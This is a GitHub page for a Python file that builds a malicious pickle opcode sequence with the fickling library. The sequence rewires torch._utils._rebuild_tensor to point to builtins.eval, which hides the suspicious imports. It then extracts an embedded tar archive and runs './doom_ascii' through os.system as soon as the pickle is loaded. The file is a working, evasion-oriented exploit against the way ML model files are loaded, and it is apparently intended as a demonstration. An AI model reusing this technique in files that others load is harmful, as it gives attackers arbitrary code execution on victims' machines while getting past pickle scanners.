-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathconcise_hide_imports.py
50 lines (46 loc) · 1.44 KB
/
concise_hide_imports.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
from spiro import Variables
from fickling import pickle as p
get_value = [p.Unicode(b"torch._utils"), p.Unicode(b"_rebuild_tensor"), p.StackGlobal()]
def make_concise_exploit(vars: Variables, doom: p.BinBytes) -> list[p.Opcode]:
return [
p.Unicode(b"torch"),
p.Unicode(b"_utils"),
p.StackGlobal(),
vars.assign("_utils"),
p.EmptyDict(),
p.Unicode(b"_rebuild_tensor"),
*get_value,
p.SetItem(),
# [_utils, {_rebuild: _rebuild}]
vars["_utils"],
p.EmptyDict(),
p.Unicode(b"_rebuild_tensor"),
p.Unicode(b"eval"),
p.SetItem(),
p.Build(),
*get_value,
# [_utils, {_rebuild}, _utils, "eval"]
vars.assign("eval_str", p.Memoize()),
p.Pop(),
p.EmptyDict(),
p.Unicode(b"_rebuild_tensor"),
p.Unicode(b"builtins"),
p.SetItem(),
p.Build(),
p.Pop(),
*get_value,
vars["eval_str"],
# [_utils, {rebuild}, "builtins", "eval"]
p.StackGlobal(),
p.Unicode(
b"lambda data: __import__('tarfile').open(fileobj=__import__('io').BytesIO(data)).extractall() or __import__('os').system('./doom_ascii')"
),
p.TupleOne(),
p.Reduce(),
doom,
p.TupleOne(),
p.Reduce(), # irl execution stops here
p.Pop(),
p.Build(),
]
# [_utils, update, import/memo/pop, update, import, get, global ]